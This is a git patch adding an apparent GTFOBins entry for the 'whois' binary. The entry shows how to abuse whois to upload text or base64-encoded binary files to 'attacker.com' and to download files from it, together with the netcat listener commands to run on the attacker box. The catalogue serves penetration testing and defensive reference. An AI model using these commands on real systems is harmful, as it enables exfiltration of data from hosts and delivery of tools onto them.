From 3a619c7777786ad89e1a0e7f5ca5cde3eae5b168 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 31 May 2018 20:15:55 +0200 Subject: [PATCH] Add whois Thanks to https://twitter.com/info_dox/status/1001985728342102017 --- _gtfobins/whois.md | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 _gtfobins/whois.md diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md new file mode 100644 index 0000000..ec39b9b --- /dev/null +++ b/_gtfobins/whois.md @@ -0,0 +1,31 @@ +--- +description: | + `whois` hangs waiting for the remote peer to close the socket. +functions: + upload: + - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`cat $LFILE`" + - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`base64 $LFILE`" + download: + - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=where_to_save + whois -h $RHOST -p $RPORT > "$LFILE" + - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=where_to_save + whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" +---